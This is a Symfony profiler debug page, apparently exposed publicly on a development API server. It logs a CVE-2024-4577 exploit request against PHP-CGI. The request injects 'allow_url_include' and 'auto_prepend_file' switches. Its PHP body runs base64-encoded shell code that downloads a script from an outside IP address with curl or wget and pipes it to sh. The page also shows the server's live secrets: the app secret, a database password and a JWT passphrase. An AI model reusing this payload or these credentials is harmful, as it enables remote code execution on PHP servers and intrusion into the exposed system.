https://146.59.198.33/hello.world?%ADd%20allow_url_include%3D1%20%ADd%20auto_prepend_file%3Dphp%3A%2F%2Finput=

Forwarded to
ErrorController (dff4a1)
Method
POST
HTTP Status
404
IP
45.131.108.170
Profiled on
Token
f6478e

n/a

Request

GET Parameters

Key Value
�d_allow_url_include=1_�d_auto_prepend_file=php://input 
""

POST Parameters

Key Value
<?php_shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzY2LjYzLjE4Ny4xOTMvc2ggfHwgd2dldCBodHRwOi8vNjYuNjMuMTg3LjE5My9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBjdmVfMjAyNF80NTc3LnNlbGZyZXA 
"")); echo(md5("Hello CVE-2024-4577")); ?>"

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_links 
Symfony\Component\WebLink\GenericLinkProvider {#905
  -links: [
    904 => Symfony\Component\WebLink\Link {#904
      -href: "https://146.59.198.33/api/docs.jsonld"
      -rel: [
        "http://www.w3.org/ns/hydra/core#apiDocumentation" => "http://www.w3.org/ns/hydra/core#apiDocumentation"
      ]
      -attributes: []
    }
  ]
}
_remove_csp_headers 
true
_stopwatch_token 
"0d11f8"

Request Headers

Header Value
accept 
"*/*"
connection 
"keep-alive"
content-length 
"221"
content-type 
"application/x-www-form-urlencoded"
host 
"146.59.198.33:443"
upgrade-insecure-requests 
"1"
user-agent 
"Custom-AsyncHttpClient"
x-php-ob-level 
"1"

Request Content

Raw

<?php shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzY2LjYzLjE4Ny4xOTMvc2ggfHwgd2dldCBodHRwOi8vNjYuNjMuMTg3LjE5My9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBjdmVfMjAyNF80NTc3LnNlbGZyZXA=")); echo(md5("Hello CVE-2024-4577")); ?>

Response

Response Headers

Header Value
cache-control 
"no-cache, private"
content-type 
"text/html; charset=UTF-8"
date 
"Sun, 03 Aug 2025 20:49:59 GMT"
link 
"<https://146.59.198.33/api/docs.jsonld>; rel="http://www.w3.org/ns/hydra/core#apiDocumentation""
x-debug-exception 
"No%20route%20found%20for%20%22POST%20https%3A%2F%2F146.59.198.33%2Fhello.world%22"
x-debug-exception-file 
"%2Fvar%2Fwww%2Fapi-development%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:135"
x-debug-token 
"f6478e"
x-debug-token-link 
"https://146.59.198.33/_profiler/dff4a1"
x-previous-debug-token 
"dff4a1"
x-robots-tag 
"noindex"

Cookies

Request Cookies

No request cookies

Response Cookies

No response cookies

Session

Session Metadata

No session metadata

Session Attributes

No session attributes

Session Usage

0 Usages
Stateless check enabled

Session not used.

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
APP_ENV 
"dev"
APP_SECRET 
"2dae014c89d06331b1ca21b466fab6be"
CORS_ALLOW_ORIGIN 
"*"
DATABASE_URL 
"mysql://development:yDo%ly.pKiT7FuBf@127.0.0.1:3306/development?serverVersion=mariadb-10.5.15"
JWT_PASSPHRASE 
"141c5266771957e8090ddb07cd52fe5c10812c20aec0065db4605d4a63332dd6"
JWT_PUBLIC_KEY 
"%kernel.project_dir%/config/jwt/public.pem"
JWT_SECRET_KEY 
"%kernel.project_dir%/config/jwt/private.pem"

Defined as regular env variables

Key Value
APP_DEBUG 
"1"
CONTENT_LENGTH 
"221"
CONTENT_TYPE 
"application/x-www-form-urlencoded"
CONTEXT_DOCUMENT_ROOT 
"/var/www/api-development/public"
CONTEXT_PREFIX 
""
DOCUMENT_ROOT 
"/var/www/api-development/public"
FCGI_ROLE 
"RESPONDER"
GATEWAY_INTERFACE 
"CGI/1.1"
HOME 
"/var/www/api-development"
HTTPS 
"on"
HTTP_ACCEPT 
"*/*"
HTTP_CONNECTION 
"keep-alive"
HTTP_HOST 
"146.59.198.33:443"
HTTP_UPGRADE_INSECURE_REQUESTS 
"1"
HTTP_USER_AGENT 
"Custom-AsyncHttpClient"
PATH 
"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
PHP_SELF 
"/index.php"
QUERY_STRING 
"%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
REDIRECT_HTTPS 
"on"
REDIRECT_QUERY_STRING 
"%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
REDIRECT_STATUS 
"200"
REDIRECT_URL 
"/hello.world"
REMOTE_ADDR 
"45.131.108.170"
REMOTE_PORT 
"49380"
REQUEST_METHOD 
"POST"
REQUEST_SCHEME 
"https"
REQUEST_TIME 
1754254199
REQUEST_TIME_FLOAT 
1754254199.0788
REQUEST_URI 
"/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
SCRIPT_FILENAME 
"/var/www/api-development/public/index.php"
SCRIPT_NAME 
"/index.php"
SERVER_ADDR 
"146.59.198.33"
SERVER_ADMIN 
"webmaster@web2pack.fr"
SERVER_NAME 
"146.59.198.33"
SERVER_PORT 
"443"
SERVER_PROTOCOL 
"HTTP/1.1"
SERVER_SIGNATURE 
""
SERVER_SOFTWARE 
"Apache"
SYMFONY_DOTENV_VARS 
"APP_ENV,APP_SECRET,DATABASE_URL,CORS_ALLOW_ORIGIN,JWT_SECRET_KEY,JWT_PUBLIC_KEY,JWT_PASSPHRASE"
USER 
"api-development"
proxy-nokeepalive 
"1"

Sub Requests 1

ErrorController (token = dff4a1)

Key Value
_controller 
"error_controller"
_links 
Symfony\Component\WebLink\GenericLinkProvider {#709
  -links: [
    708 => Symfony\Component\WebLink\Link {#708
      -href: "https://146.59.198.33/api/docs.jsonld"
      -rel: [
        "http://www.w3.org/ns/hydra/core#apiDocumentation" => "http://www.w3.org/ns/hydra/core#apiDocumentation"
      ]
      -attributes: []
    }
  ]
}
_stopwatch_token 
"0c4fbf"
exception 
Symfony\Component\HttpKernel\Exception\NotFoundHttpException {#483
  -statusCode: 404
  -headers: []
  #message: "No route found for "POST https://146.59.198.33/hello.world""
  #code: 0
  #file: "/var/www/api-development/vendor/symfony/http-kernel/EventListener/RouterListener.php"
  #line: 135
  -previous: Symfony\Component\Routing\Exception\ResourceNotFoundException {#458 …}
  trace: {
    /var/www/api-development/vendor/symfony/http-kernel/EventListener/RouterListener.php:135 {
      Symfony\Component\HttpKernel\EventListener\RouterListener->onKernelRequest(RequestEvent $event) …
      › 
      ›     throw new NotFoundHttpException($message, $e);} catch (MethodNotAllowedException $e) {
    }
    /var/www/api-development/vendor/symfony/event-dispatcher/Debug/WrappedListener.php:117 {
      Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object $event, string $eventName, EventDispatcherInterface $dispatcher): void …
      › 
      › ($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);}
    /var/www/api-development/vendor/symfony/event-dispatcher/EventDispatcher.php:230 {
      Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event) …
      ›     }    $listener($event, $eventName, $this);}
    }
    /var/www/api-development/vendor/symfony/event-dispatcher/EventDispatcher.php:59 {
      Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, string $eventName = null): object …
      › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
    }
    /var/www/api-development/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:154 {
      Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object $event, string $eventName = null): object …
      › try {    $this->dispatcher->dispatch($event, $eventName);} finally {
    }
    /var/www/api-development/vendor/symfony/http-kernel/HttpKernel.php:129 {
      Symfony\Component\HttpKernel\HttpKernel->handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response …
      › $event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);}
    /var/www/api-development/vendor/symfony/http-kernel/HttpKernel.php:75 {
      Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › try {    return $this->handleRaw($request, $type);} catch (\Exception $e) {
    }
    /var/www/api-development/vendor/symfony/http-kernel/Kernel.php:202 {
      Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › try {    return $this->getHttpKernel()->handle($request, $type, $catch);} finally {
    }
    /var/www/api-development/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php:35 {
      Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner->run(): int …
      › {    $response = $this->kernel->handle($this->request);    $response->send();
    }
    /var/www/api-development/vendor/autoload_runtime.php:35 {
      require_once …
      ›         ->getRunner($app)        ->run());
    }
    /var/www/api-development/public/index.php:5 {
      › 
      › require_once dirname(__DIR__).'/vendor/autoload_runtime.php';arguments: {
        "/var/www/api-development/vendor/autoload_runtime.php"
      }
    }
  }
}
logger 
null